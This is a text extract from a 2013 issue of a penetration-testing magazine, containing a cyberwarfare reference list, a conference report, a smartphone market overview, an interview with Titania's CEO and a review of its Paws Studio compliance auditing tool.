• Bush, G. W. (2008). Comprehensive National Cybersecurity Initiative
(CNCI). Published by the White House January 2008. Retrieved
from http://www.whitehouse.gov/cybersecurity/comprehensive-
national-cybersecurity-initiative on January 5, 2012.
• Carr, J. (2012). Inside Cyber Warfare, second edition. Sebastopol,
CA: O’Reilly.
• Clarke, R. A. and Knake, R. K. (2010). Cyberwar: the Next Threat
to National Security and What to Do About It. New York, NY:
HarperCollins Publishers.
• Crosston, M. (2011). World Gone Cyber MAD: How “Mutually
Assured Debilitation” Is the Best Hope for Cyber Deterrence. An
article published in the Strategic Studies Quarterly, Spring 2011.
Retrieved from http://www.au.af.mil/au/ssq/2011/spring/crosston.pdf
on October 10, 2012.
• Czosseck, C. and Geers, K. (2009). The Virtual battlefeld:
Perspectives on Cyber Warfare. Washington, DC: IOS Press.
• Edwards, M. and Stauffer, T. (2008). Control System Security
Assessments. A technical paper presented at the 2008 Automation
Summit – A Users Conference, in Chicago. Retrieved from http://
www.infracritical.com/papers/nstb-2481.pdf on December 20, 2011.
• Fayutkin, D. (2012). The American and Russian Approaches to
Cyber Challenges. Defence Force Offcer, Israel. Retrieved from
Table 3. A 10-step Remedy toward the Creation of National Policy (Kramer, et al, 2009)
Idea Explanation
Unify Policy Direction Efective policies will not be created by a single person or entity, but they require
centralized leadership to unify their direction and intent.
Specialize Policy Direction Recognizing that one size does not ft all, specialized policies need to be created for
varies infrastructures and industries to ensure maximum protection.
Strengthen and Unify Regulation Regulations must be strengthened to be more efective, or new, more efective regu-
lations must be created.
Defne State and Local Roles A workable Federal policy must have the involvement of state and local authorities
to be efective
Defne International Interfaces This is required because cyberspace is connected internationally and because there
is still lack of international agreement on many aspects of cyberwar.
Mandate Efective Systems Engineering for
Infrastructure-related Software
Ensure that there is a realization and commitment for the need to have higher mini-
mum standards for the quality of software that is related to infrastructure.
Don’t Take No for an Answer Ensure that stakeholders and those responsible participants realize the resolute,
unwavering commitment toward a workable policy solution
Establish and Implement Clear Priorities This will ensure the best allocation of fnancial and management resources.
Inform the Public Clearly and Accurately The public needs to understand the eforts being made to protect the U.S.
Conduct a Continuing Program of Research Keep the policy updated and relevant to changing technologies.
WAR CAMP
58 http://pentestmag.com Page OPEN 05/2013
http://omicsgroup.org/journals/2167-0374/2167-0374-2-110.pdf on
September 30, 2012.
• Freedman, L. (2003). The Evolution of Nuclear Strategy. New York,
NY: Palgrave Macmillan.
• Gerwitz, D. (2011). The Obama Cyberdoctrine: tweet softly, but
carry a big stick. An article published at Zdnet.com on May 17,
2011. Retrieved from http://www.zdnet.com/blog/government/the-
obama-cyberdoctrine-tweet-softly-but-carry-a-big-stick/10400 on
September 25, 2012.
• Gjelten, T. (2010). Are ‘Stuxnet’ Worm Attacks Cyberwarfare? An
article published at NPR.org on October 1, 2011. Retrieved from
http://www.npr.org/2011/09/26/140789306/security-expert-u-s-
leading-force-behind-stuxnet on December 20, 2011.
• Gjelten, T. (2010). Stuxnet Computer Worm Has Vast Repercussions.
An article published at NPR.org on October 1, 2011. Retrieved from
http://www.npr.org/templates/story/story.php?storyId=130260413 on
December 20, 2011.
• Gjelten, T. (2011). Security Expert: U.S. ‘Leading Force’ Behind
Stuxnet. An article published at NPR.org on September 26, 2011.
Retrieved from http://www.npr.org/2011/09/26/140789306/security-
expert-u-s-leading-force-
• behind-stuxnet on December 20, 2011.
• Gjelten, T. (2011). Stuxnet Raises ‘Blowback’ Risk In Cyberwar. An
article published at NPR.org on December 11, 2011. Retrieved from
http://www.npr.org/2011/11/02/141908180/stuxnet-raises-blowback-
risk-in-cyberwar on December 20, 2011.
• Hagestad, W. T. (2012). 21st Century Chinese Cyberwarfare.
Cambridgeshire, U.K.: IT Governance.
• Hyacinthe, B. P. (2009). Cyber Warriors at War: U.S. National
Security Secrets & Fears Revealed. Bloomington, IN: Xlibris
Corporation.
• Jaquith, A. (2007). Security Metrics. Boston, MA: Addison Wesley.
• Kaplan, F. (1983), The Wizards of Armageddon: The Untold Story of
a Small Group of Men Who Have Devised the Plans and Shaped
the Policies on How to Use the Bomb. Stanford, CA: Stanford
University Press.
• Kerr, D. (2012). Senator urges Obama to issue ‘cybersecurity’
executive order. An article published at Cnet.com on September
24, 2012. Retrieved from http://news.cnet.com/8301-1009_3-
57519484- 83/senator-urges- obama-to-i ssue-cybersecuri t y-
executive-order/ on September 26, 2012.
• Kramer, F. D. (ed.), et al. (2009). Cyberpower and National Security.
Washington, DC: National Defense University.
• Langer, R. (2010). A Detailed Analysis of the Stuxnet Worm.
Retrieved from http://www.langner.com/en/blog/page/6/ on
December 20, 2011.
• Libicki, M.C. (2009). Cyberdeterrence and Cyberwar. Santa Monica,
CA: Rand Corporation.
• Markoff, J. and Kramer, A. E. (2009). U.S. and Russia Differ on
a Treaty for Cyberspace. An article published in the New York
Times on June 28, 2009. Retrieved from http://www.nytimes.
com/2009/06/28/world/28cyber.html?pagewanted=all on June 28,
2009.
• Mayday, M. (2012). Iran Attacks US Banks in Cyber War: Attacks
target three major banks, using Muslim outrage as cover. An article
published on September 22, 2012 at Poltix.Topix.com. Retrieved
from http://politix.topix.com/homepage/2214-iran-attacks-us-banks-
in-cyber-war on September 22, 2012.
• McBrie, J. M. (2007). THE BUSH DOCTRINE: SHIFTING POSITION
AND CLOSING THE STANCE. A scholarly paper published by the
USAWC STRATEGY RESEARCH PROJECT. Retrieved from http://
www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA423774 on September 30,
2012.
• Obama, B. H. (2012). Defense Strategic Guidance 2012 – Sustaining
Global Leadership: Priorities for 21st Century Defense. Published
January 3, 2012. Retrieved from http://www.defense.gov/news/
Defense_Strategic_Guidance.pdf on January 5, 2012.
• Obama, B.H. (2011). INTERNATIONAL STRATEGY for Cyberspace.
Published by the White House on May 16, 2011. Retrieved
from http://www.whitehouse.gov/sites/default/fles/rss_viewer/
international_strategy_for_cyberspace.pdf on May 16, 2011.
• Payne, K. B. (2001). The Fallacies of Cold War Deterrence and a
New Direction. Lexington, KY: The University of Kentucky Press.
• Pry, P. V. (1999). War Scare: Russia and America on the Nuclear
Brink. Westport, CT: Praeger Publications.
• Radcliff, D. (2012). Cyber cold war: Espionage and warfare. An
article published in SC Magazine, September 4, 2012. Retrieved
from http://www.scmagazine.com/cyber-cold-war-espionage-and-
warfare/article/254627/ on September 7, 2012.
• Saini, M. (2012). Preparing for Cyberwar – A National Perspective.
An article published on July 26, 2012 at the Vivikanda International
Foundation. Retrieved from http://www.vifndia.org/article/2012/
july/26/preparing-for-cyberwar-a-national-perspective on October
14, 2012.
• Sanger, D. E. (2012). Confront and Coneal: Obama’s Secret Wars
and Surprising Use of America Power. New York, NY: Crown
Publishers.
• Schmidt, H. S. (2006). Patrolling Cyberspace: Lessons Learned from
Lifetime in Data Security. N. Potomac, MD: Larstan Publishing, Inc.
• Schmitt, E. and Shanker, T. (2011). U.S. Debated Cyberwarfare
in Attack Plan on Libya. An article published in the New York
Times on October 17, 2011. Retrieved from http://www.nytimes.
com/2011/10/18/world/africa/cyber-warfare-against-libya-was-
debated-by-us.html on October 17, 2011.
• Stiennon, R. (2010). Surviving Cyber War. Lanham, MA: Government
Institutes.
• Strohm, C. and Engleman, E. (2012). Cyber Attacks on U.S. Banks
Expose Vulnerabilities. An article published at BusinessWeek.com
on September 28, 2012. Retrieved from http://www.businessweek.
com/news/2012-09-27/cyber-attacks-on-u-dot-s-dot-banks-expose-
computer-vulnerability on September 30, 2012.
• Technolytics. (2012). Cyber Commander’s eHandbook: The
Weaponry and Strategies of Digital Confict, third edition.
Purchased and downloaded on September 26, 2012.
• Turzanski, E. and Husick, L. (2012). “Why Cyber Pearl Harbor Won’t
Be Like Pearl Harbor At All...” A webinar presentation held by the
Foreign Policy Research Institute (FPRI) on October 24, 2012.
Retrieved from http://www.fpri.org/multimedia/2012/20121024.
webinar.cyberwar.html on October 25, 2012.
• U.S. Army. (1997). Toward Deterrence in the Cyber Dimension: A
Report to the President’s Commission on Critical Infrastructure
Protection. Retrieved from http://www.carlisle.army.mil/DIME/
documents/173_PCCIPDeterrenceCyberDimension_97.pdf on
November 3, 2012.
• U.S. Department of Defense, JCS. (2006). Joint Publication (JP)
5-0, Joint Operation Planning, updated on December 26, 2012.
Retrieved from http://www.dtic.mil/doctrine/new_pubs/jp5_0.pdf on
October 25, 2012.
• Waters, G. (2008). Australia and Cyber-Warfare. Canberra, Australia:
ANU E Press.
WILLIAM F. SLATER, III
William F. Slater, III is an IT securi-
ty professional who lives and works
in Chicago, IL. He has over 20-securi-
ty related certifcations, including a
CISSP, SSCP, and a CISA certifcation.
In March 2013 he completes his M.S.
in Cybersecurity Program at Bellev-
ue University in Bellevue, Nebraska.
He has written numerous articles on IT
Security and Cyberwarfare. Mr. Slater is also an adjunct
professor at the Illinois Institute of Technology and the
devoted husband of Ms. Joanna Roguska, who is a web
developer and a native of Warsaw, Poland. You can read
more about Mr. Slater at http://billslater.com/interview.
SECUCON
2013
S
ECUCON 2013 – A conference hosted by SECUGE-
NIUS – A unit of HARKSH Technologies Pvt Ltd at
GGNIMT, Ludhiana with a vision to create awareness
for the need of SECURITIES in social living and to spread
a message of generating opportunities in the same field.
Two young entrepreneurs Er. Harpreet Khattar & Er. Kshitij
Adhlakha started this venture to provide specialized oppor-
tunities to the most technical species on this earth. They au-
thored a book named 'Security Breached' which was launched
on the same day by Chief Guest of the event Mr. Mahesh
Inder Grewal, Advisor to CM Punjab alongwith Mr. A.S. Rai,
Inspector General Punjab & Dr. Maninder Singh, Head Com-
puter Deptt. Thapar University Patiala.
Session innaugrated by Chief Guest Mr. Mahesh Inder Gre-
wal by a enlightning speech on the use of securities in soci-
ety and launching the Book 'Security Breached' authored by
Er. Harpreet Khattar & Er. Kshitij Adhlakha. Harpreet Khat-
tar told how he started his company named SECUGENIUS
& Harksh Technologies. As a team, with his partner Kshitij
Adhlakha, they wanted to do something supporting the ca-
reer of youth and to divert them into the upcoming feld of In-
formation Security. He discussed the platforms and oppor-
tunities provided by government for the effective use and
utilization of resources and studies in the domain of secu-
rities followed by Kshitij Adhlakha & other esteemed speak-
ers of the conference which generated the heat of securities
Audience in the conference experienced height of future be-
longings by the indepth knowledge of speakers from 3 coun-
tries on the most technical and social fields of IT Security and
to curb hacking from society. Following is the list of speakers
in the conference:
1. Er. Harpreet Khattar
2. Er. Kshitij Adhlakha
3. Dr. Maninder Singh
4. Mr. A.S. Rai
5. Dr. S.N Panda
6. Dr. M.S. Pabla
7. Ivneet Singh
8. Shenddy Jimenez
9. Nipun Jaswal
10. Shubhamoy Chakarborty
11. Theresa Michael
12. Dr. Parminder Singh
13. Col. Gurinder Singh Saini
14. Kailash D Agarwal
amongst audience which constituted four categories and
four sessions in these 2 days i.e. 25th and 26thMay, 2013:
Political Dignitaries and Defence Forces Personnel
Academicians
Industry CEO’s & Community representatives
Students and Social Communists
The conference concluded by Dr. Gunwant Singh Dua (Di-
rector GGNIMT) on behalf of SECUGENIUS in Association
with GGNIMT after launching a specialized course for the
students and professionals in the same venue which will be
going on for next 2 months with a vision that each student
participating in this course could earn handsome opportuni-
ties in their future endurances. This conference was orga-
nized and managed by SECUGENIUS – A unit of Harksh
Technologies Pvt Ltd. In coordination and support of venue
by Gujranwala Guru Nanak Institute of Management & Tech-
nology and promoted by FTG Solutions. This conference
was covered by various newspapers, media and other out-
station magazines thereafter.
LET'S TALK ABOUT SECURITY
60 http://pentestmag.com Page OPEN 05/2013
Smartphone a win-win
Product for Both Consumers and Sellers
In a world where technology can be used for multiple exchanges,
the use of mobile phones is no longer limited to simple voice
communication functions. Mobiles are now providing access to a
growing number of services due to Smartphone.
A
smartphone is a mobile phone built on a mo-
bile operating system, with more advanced
computing capability connectivity than a fea-
ture phone. Now a days, phones aren’t just for ba-
sic needs like talking and texting, they have many
advanced features like - internet, email, gaming, or-
ganizing, taking photos, playing music, shopping,
watching movies and more. These features com-
bined together constitute a smartphone. The build-
ing block of any smartphone is its operating system
(OS). The smartphone market is among the largest
and fastest growing markets in the world of consum-
er electronics. An operating system manages the
hardware and software resources of smartphones.
It is currently dominated by the Android and iphone
smartphone, with BlackBerry and Symbian Phone
at a distant 3rd and 4th position.
Nowadays, Smartphones are the basic part of
life for every corporate employee. They use smart-
phone devices to gain access to the companies
credential and to check company specific mails and
data. Thus security remains a big concern at the
workplace. So penetration testing needs to be done
at every available aspect whenever it is possible.
Body
Smartphone growth and adaptation is increasing
rapidly worldwide due to their rich and versatile
functionality. The versatility and convenience of
these devices makes them priority from other simi-
lar devices like PDAs (Personal Digital Assistants)
or Tablets.
Today, a Smartphone is not just used to talk;
rather it is utilized for a wide array of services viz.,
GPS, MP3 Player, a range of entertainment, elec-
tronic banking, reading e-books or attending office
meetings online. Such a diverse mixture of servic-
es can only be delivered with the combination of
strong compact hardware and high-speed reliable
software with a good Operating System.
Smartphone Operating System
Google’s Android platform is expected to have the
largest share of the global smartphone operating
system market by 2014. Companies making An-
droid devices include Samsung, HTC and Motor-
ola Mobility, which Google owns. Samsung also
makes phones running Bada, which is based on
Linux. Nokia has traditionally relied on Symbian,
but it is banking its future on Windows. Android
and iOS have combined for 87.6% of the 2012
smartphone market.
As per the shipment numbers, Android had 68%
market share of worldwide smartphones in Q2,
2012 with iOS a distant second at 16.9%. Despite
being down year-on-year, BlackBerry and Symbi-
61 http://pentestmag.com Page OPEN 05/2013
an came in third and fourth, while Windows Phone,
which almost doubled its shipments, only had 3.5%
of the Q2, 2012 market share (Figure 1).
Samsung is the undisputed leader in the world-
wide smartphone market. By the end of 1Q13,
Samsung shipped more units than the combined
shipment of the next four vendors. The Apple has
held the second spot in the smartphone market.
Apple’s mix of models shipped to market is in-
creasingly diversified as it tries to reach new buy-
ers. LG smartphone volume for the quarter was
driven in large part by its 3G smartphone port-
folio, namely the L series and the Nexus 4. LTE-
enabled devices, including the Optimus G series,
also contributed to its success. LG is anticipated
to continue its upward trajectory with the launch
of the F and L series targeting the mid-range and
entry-level segments. Huawei has shown sig-
nificant improvement, it has decreased its de-
pendence on rebranded feature phones while
growing its Ascend portfolio to address multiple
customer segments with more branded smart-
phone offerings. In 2013, ZTE focus is to grow in
North America and Europe. In China, where in-
creasing price pressure has challenged vendors
to grow profitably, ZTE will emphasize its high-
er-price products. In addition, ZTE will be among
the first companies to launch a Firefox-powered
smartphone in 2013 (Figure 2-4).
In today’s fast paced corporate world, every em-
ploy no matter whether they are from IT or top ex-
ecutives all rely on having continuous real time
access to company data. Probably, many employ-
ees access their company email and files on their
smartphone devices. Companies at present have
two alternatives; First, Issue Company owned
smartphones to employees or Second: let employ-
ees to bring their own device to work to be inte-
grated with the network. The security posture of
Figure 1. Global – Top Smartphone Operating System
Market Share (Percent), Quarter2, 2012. Source: IDC
Worldwide Mobile Phone Tracker, August 8, 2012
Figure 2. Global – Top Five Smartphone Vendors, Unit Shipments (Million), Quarter1, 2013. Source: IDC Worldwide
Mobile Phone Tracker, April 25, 2013
Figure 3. Global – Top Five Smartphone Vendors, Market
Share (Percent), Quarter1, 2012. Source: IDC Worldwide Mobile
Phone Tracker, April 25, 2013
LET'S TALK ABOUT SECURITY
62 http://pentestmag.com Page OPEN 05/2013
the smartphone in the workplace becomes a criti-
cal issue.
With increasing utilization of smartphones in the
workplace, sharing the network and accessing
sensitive data, it is very crucial to be able to as-
sess the security posture of these devices in the
similar way we perform penetration tests on work-
stations and servers. However, smartphones have
unique attack vectors that are not currently cov-
ered by available industry tools. The smartphone
penetration testing framework, the result of a DAR-
PA Cyber Fast Track project, aims to provide many
facets of assessing the security posture of these
devices.
The Smartphone Pentest Framework (SPF) is an
open source tool designed to allow users to assess
the security posture of the smartphones deployed
in an environment. The tool allows for assessment
of remote vulnerabilities, client side attacks, social
engineering attacks, post exploitation and local
privilege escalation.
SPF tool allows users to assess the security of
the smartphones in the environment in the manner
they’ve come to expect with modern penetration
testing tools. SPF is made up of several parts that
may be mixed and matched to meet users’ needs:
• SPF Console
• SPF Web based GUI
• SPF Android App
• SPF Android Agent
Conclusion
The smartphone market share trends point to the
fact that Android is the market leader and going
forward it is expected to be the undisputed lead-
er, with the iPhone as a strong 2 player. Symbian
seems to be dying out in terms of consumer mind-
share and Windows Phone is struggling as well to
gain the market share. Windows Phone 8 platform
is also not gaining too much headway at this point.
If Microsoft isn’t able to mount a serious push to
become relevant as a third platform by 2013, it
may open the door to competition from Firefox’s
HTML based smartphone OS.
RAJIV RANJAN
Rajiv Ranjan is working as Senior Research Ana-
lyst with Renub Research. He is holding a MBA degree
and has more than 5 years of telecom domain experi-
ence. For more questions on this article mention author
name and article title in the subject line and write to us
[email protected].
Figure 4. Global – Top Five Smartphone Vendors, Market
Share (Percent), Quarter1, 2013. Source: IDC Worldwide Mobile
Phone Tracker, April 25, 2013
About Us
Renub Research is a leading Management Consultan-
cy and Market Research Company. We have more than
10 years of experience in Research, Survey and Con-
sulting. We provide wide range of business research
solutions that helps companies in making better busi-
ness decisions. We partner with clients in all sectors
and regions to identify their highest-value opportuni-
ties, address their most critical challenges, and trans-
form their businesses.
Our wide clientele comprises of major players in Li-
fe Sciences, Information Technology, Telecom, Finan-
cial Services (Banking, Insurance), Energy, Retail, Ma-
nufacturing, Automotive, and Social sector. Our clients
rely on our market analysis and data to make informed
knowledgeable decisions. We are regarded as one of
the best providers of knowledge. Our pertinent analy-
sis helps consultants, bankers and executives to make
informed and correct decisions.
Few of our published reports on Telecom
Sector
• South Africa Mobile Service Market, Subscribers
& Companies Forecast to 2015 http://www.renub.
com/report/south-africa-mobile-service-market-
subscribers-companies- forecast-to-2015-87
• Mobile Payment Market, Users Worldwide & Coun-
tries Forecast to 2014 http://www.renub.com/re-
port/mobile-payment-market-users-worldwide-
countries-forecast- to-2014-59
• India Smartphone Market & Operating System
Analysis Forecast http://www.renub.com/report/
india-smartphone-market-operating-system-anal-
ysis-forecast-54
INTERVIEW
64 http://pentestmag.com Page OPEN 05/2013
Interview with
Ian Whiting,
CEO of Titania Company
Ian has been working with leading global organizations and
government agencies to help improve computer security for more
than a decade. He has been accredited by CESG for his security
and team leading expertise for over 5 years. In 2009 Ian Whiting
founded Titania with the aim of producing security auditing software
products that can be used by non-security specialists and provide the
detailed analysis that traditionally only an experienced penetration
tester could achieve. Today Titania’s products are used in over 40
countries by government and military agencies, financial institutions,
telecommunications companies, national infrastructure organizations
and auditing companies, to help them secure critical systems.
Hello Ian, please tell us few words about
Titania.
Titania was founded with the aim of developing
easy to use security auditing software that per-
forms a detailed analysis of systems that other-
wise would require specialist knowledge. The soft-
ware that we have released to date has assisted
both government and leading businesses in better
securing their networks. In the process, Titania has
gained critical acclaim from leading industry ana-
lysts and several awards.
Since opening our first office in December 2010,
Titania has experienced considerable growth. We
now supply our products directly, and through a
network of global partners, to organizations in over
40 countries worldwide. Our customers tend to be
those that are security conscious, in sectors such
as finance, defense, telecommunications, auditing
and manufacturing.
What is it like leading a company like
Titania and what are some of your
challenges you face?
There are of course many technical and develop-
ment challenges to running a business like Titania
that specializes in cyber security auditing. Howev-
er, as soon as we started trading or largest prob-
lem was responding to our customers’ requests to
purchase the software and keep up with the de-
mand for new features and functionality. In fact our
largest challenge to date has been to manage the
growth of the company.
We are always looking to keep ahead of the com-
petition and we have decided on a plan to achieve
that goal through the technical capabilities of our
products rather than through our companies mar-
keting arm. So although we sometimes have a dif-
ficult time communicating our message, our prod-
ucts speak for themselves.
Do you offer any professional services?
We do not provide any professional services at
present, though we are always continuing to re-
view that situation. So we may add professional
services at a later stage, both directly and through
our network of global partners.
65 http://pentestmag.com Page OPEN 05/2013
Users of our software do not require training ser-
vices as one of our development goals was always
to make our products as easy to use as possible.
I believe we have succeeded in that goal. I have
personally seen non-technical people produce de-
tailed and complex security audit reports using our
software with no previous experience with the tool.
This being said, we are not resting on our laurels
and we continue to look at ways to further improve
user interaction with our products.
How often do you refresh (update) your
products to meet the latest security
challenges and threats?
Our products are continually being updated and are
evolving to meet the requirements of our custom-
ers and the new issues that emerge in the industry.
Typically each of our products has a short release
cycle with updates being made available monthly.
Can you mention some of your top-selling
products?
Nipper Studio is our company’s flagship product.
It takes the manual process of reviewing how net-
work switches, routers and firewalls have been
configured and automates it. This is not done us-
ing the intrusive method of scanning a network de-
vice, which would not give you the full picture of
how the device has been setup, but by analysing
their native configuration.
The reports that are produced by Nipper Studio
can contain security audit findings, compliance re-
porting, configuration reporting and more. The re-
ports produced are equally detailed and specific,
they were designed with technology that writes the
report just like a human would. This is in contrast
to traditional computer report writing technology
that simply joins pre-written paragraphs of text to-
gether and rarely accurately describes how some-
thing specific has been configured.
Our most recent product, Paws Studio, is a Win-
dows compliance product for servers, workstations
and cloud-based systems. It was developed based
on very specific security requirements of our cus-
tomers who work in highly secure environments,
with very sensitive information. They needed a so-
lution that could be run without installing software
on the audited system. Therefore we built Paws
Studio to be able to run over the network, on the
local system or offline with no connection to the
audited system.
Although we have pre-configured Paws Studio
with a number of different compliance check lists,
you can define your own compliance checklist
within the product. We have developed an Policy
Editor that enables you to either modify one of the
pre-defined compliance lists or create one of your
own from scratch.
All of our products have been designed to be
integrated with bespoke and third-party systems,
including continuous monitoring setups. They
can easily be integrated using a scriptable inter-
face and you can export the report data in a vari-
ety of different formats. We also release our prod-
ucts with multi-platform support covering Microsoft
Windows, Apple Mac OS X, Red Hat Linux, Ubun-
tu, Fedora and so on.
Our customers are very important to us and their
needs play a key role in the development of all of
our products. We base a lot of our development
plans around their feedback and requests.
Where do you see Network Security
heading in next few years? What are some
of your predictions?
I see that security compliance is going to play an
ever larger role within the industry than it does to-
day. It is great to see progress towards an ever
improving security baseline, but it also saddens
me to see many organizations depending solely
on compliance as the means to being secure. It is
why I believe it is important that the security indus-
try, in addition to enhancing security compliance
lists, highlight the fact that being compliant does
not mean you are secure.
Unfortunately I can see there will continue to be
security breaches in organizations who manage
security risks with compliance instead of striving
to ensure a truly secure environment. You can al-
most picture the victim company’s statement now. It
would read something along the lines of, “The com-
pany had met their compliance standards and we
are now reviewing our current operating practices to
ensure how best future breaches could be avoided”.
Nipper Studio is fairly popular in the
network security industry; can you give
us some historical background on that
product?
I have a background as a penetration tester and
regularly performed manual assessments of vari-
ous network devices. A proper assessment of a
network device is not a five minute task, each as-
pect of how a device can be configured needs to be
properly analysed and any potential security risks
highlighted. Anyone who is simply reviewing firewall
INTERVIEW
66 http://pentestmag.com Page OPEN 05/2013
rules is not doing a thorough job. It is also a task that
requires a high level of knowledge about the device
being reviewed. It seemed to me that this is exactly
the type of task that is suitable for automation.
***** It is worth noting that although penetration testers are typically both
highly skilled and adaptable, they cannot be expected to have in-depth
knowledge of every system they come across. The same is also true of
the network administrators who manage those systems, they may not
have the in-depth security background required to identify potential weak-
nesses in their systems. Nipper Studio is exactly the type of solution that
could help each side. Giving penetration testers, device specifc assis-
tance and helping network administrators identify potential security weak-
nesses. *****
Although Nipper Studio originally started life sim-
ply identifying a limited number of security weak-
nesses with Cisco configurations, it soon grew to
adding support for more devices, identifying more
security weaknesses and eventually writing the se-
curity audit report for you.
At Titania, how do you strive to achieve
top-quality software? What kind of
quality control do the products go
through?
This is a very challenging aspect of developing a
product such as Nipper Studio. The number of mov-
ing variables involved with the development process
is huge. We support a large number of different de-
vices, the manufacturers of which are constantly
updating and revising their platforms. Plus the vul-
nerabilities in each platform are forever evolving.
We maintain a growing test environment that in-
cludes the different devices that we support, plan
to support and some others that may never get
added to Nipper Studio. These are all used dur-
ing the development and testing process, together
with different firmware versions. To help manage
the development plan for this we employ a devel-
opment and tracking system that enables us to
manage all these variables together with improve-
ments suggested by our customers. Each devel-
oper and tester knows from our tracking system
what tasks they need to be working on next.
Nipper Studio supports various Cisco
devices and some people may be under the
impression it only supports Cisco devices.
What would you like to say about that?
Nipper Studio does support a wide range of Cisco
devices, it was originally developed with only Cis-
co support and it is used by Cisco. So it is easy to
understand how historically Nipper Studio could be
mistaken for supporting only Cisco devices. How-
ever, the latest versions of Nipper Studio support
over 100 different devices from different manufac-
turers and are used internally by a growing number
of those manufacturers.
Even a network that predominantly uses devic-
es made by a single manufacturer will undoubt-
edly have a number of network devices made by
someone else. We are often approached by cus-
tomers asking for us to add support for unusual
systems and devices. The network devices that
we see deployed in data centers has evolved over
time with increasing deployments of some devices
and the reduction in others. We have developed a
plugin-based architecture for Nipper Studio to help
us adapt to those changes, enabling us to quickly
develop, test and deploy support for new devices.
Very often clients complain that they
are not offered good product/customer
support. How do you ensure good
customer support?
It was important for us to achieve our ISO 9001
accreditation as it helps us to ensure that every
customer receives the same high standard of sup-
port from the point that they first engage with the
company to when they receive the product and the
subsequent support process that follows. We be-
lieve that every customer deserves great customer
service and technical support and we offer these
services free of charge to every one of our custom-
ers. Our ISO 9001 conformance not only ensures
that all of our staff deliver the highest level of sup-
port but also promotes continuous improvement
throughout the company. We achieve this through
collecting and reviewing customer feedback and
auditing our customer care processes.
Thank you Ian, for the interview.
By PenTest Team
Titania
Titania was founded in 2009 and develops network se-
curity and compliance auditing software. We now pro-
vide our products to global organizations and govern-
ment agencies in over 40 countries. Our fagship prod-
uct, Nipper Studio, enables organizations to produce ex-
pert level reports in seconds on network devices (fre-
walls, switches, routers etc.), and has been recognized
by multiple industry awards and nominations. Our cus-
tomers are made up largely of organizations in the Fi-
nancial, Telecommunications, IT Security, Government
and Defense industries, however any organization that
has networks to protect can beneft from using our se-
curity auditing tools.
© SAIC. All rights reserved.
NATIONAL SECURITY
Securing the Future in the Cyber Domain
Trust. Inform. Protect.
SAIC is helping secure the future by delivering trusted technology, advanced cybersecurity
operations and actionable intelligence solutions.
By empowering our customers with innovative advanced data management solutions
that inform and protect in real time, SAIC helps provide our customers with a competitive
advantage in the cyber domain.
Learn more at saic.com/cybersecurity
NYSE: SAI
68 http://pentestmag.com Page OPEN 05/2013
Titania’s Paws Studio
Review
Whether you see compliance as a burden or an aspiration we are frequently mandated to meet a cer-
tain set of security requirements around our information assets. One important aspect is being able to
demonstrate to yourself and to others that your systems meet the criteria set by your compliance regime.
How do you ensure that your systems are compliant with your policies or those mandated by compliance
standards? A program of auditing your systems will help you understand the state of your estate.
Titania’s Paws Studio provides a means to audit Windows and Linux systems and provide compliance
reports against a defined set of policies. It sets out to provide clear and detailed reports of the system’s
level of compliance. Policy templates are editable and Paws Studio comes with predefined templates
based on established policies and best practice including PCI, SANS and DoD STIG.
Policy templates are essentially a group of compliance audit checks built from the check library pro-
vided by Paws Studio. Checks range from high-level tests such as the presence of antimalware software
right down to individual file permissions and registry settings.
There are two ways of creating and customising policy templates. The first is a wizard that guides you
through creating your policy. Here you can define the rules that comprise your policy by clicking through
a series of screen and selecting checks from the library. The interface is straightforward and self-explan-
atory and it is a great tool for less advanced users. However, the more technically minded user might
find it time consuming and prefer to use the supplied Policy Editor instead which is undoubtedly the more
powerful tool.
The Policy Editor provides you with a tree layout of your policy, giving you a bird’s eye view on the abil-
ity to quickly navigate through the rules.
In addition clicking on the advanced tab gives you a syntax-highlighted view of the raw policy XML.
Whatever tool you choose, the result is an XML file defining the compliance checks for your policy and
metadata used to generate the final compliance reports.
69 http://pentestmag.com Page OPEN 05/2013
Once you have your policy defined it’s time to audit your systems. In order to compile a report you need
the compliance audit data collected from a machine. At this point you’ve three options. You can choose
to audit the local machine where Paws Studio is installed. You can also audit a system over the network.
To do this will need valid administrator credentials on the remote system. Paws Studio will scan the local
network for hosts to audit or you can specify the IP address of the machines in scope.
The third option is to use the portable data collector software, a small executable that can be run from
a thumb drive. This is particularly useful where you need to audit a system that is not on the network or
is air gapped from your audit workstation. Run the Data Collector, choose an audit policy and it will cre-
ate a .paws file with the audit results.
Once you have collected your audit data you can produce a report on the audited system. Reports con-
tain the result of each test on the system as well as summary charts showing percent tests passed and
a breakdown of tests that failed by severity. Paws Studio creates a compliance audit report that can be
saved as HTML, PDF, PostScript or Microsoft Word document. CSV and XML formats are also available
so you can feed machine-readable reports into other reporting systems or build your own applications to
consume your compliance data.
70 http://pentestmag.com Page OPEN 05/2013
Paws Studio is available for Windows, Mac OS X and various flavours of Linux and currently supports
auditing of Windows and Linux systems. This software pitches to the SME market who could be priced
out by enterprise-grade auditing software though they are unlikely to benefit from the bells and whistles
these tools provide. If you need a cost effective and easy to use compliance reporting tool, Titania’s
Paws Studio certainly merits a second look.
By Jim Halfpenny
Pescara
Via Colle Scorrano, 5
65100 Pescara
F. +39 0857992241
[email protected]
Roma
Piazza G. Marconi,15
00144 Roma
T. +39 0632803612
F. +39 0632803283
www.quantumleap.it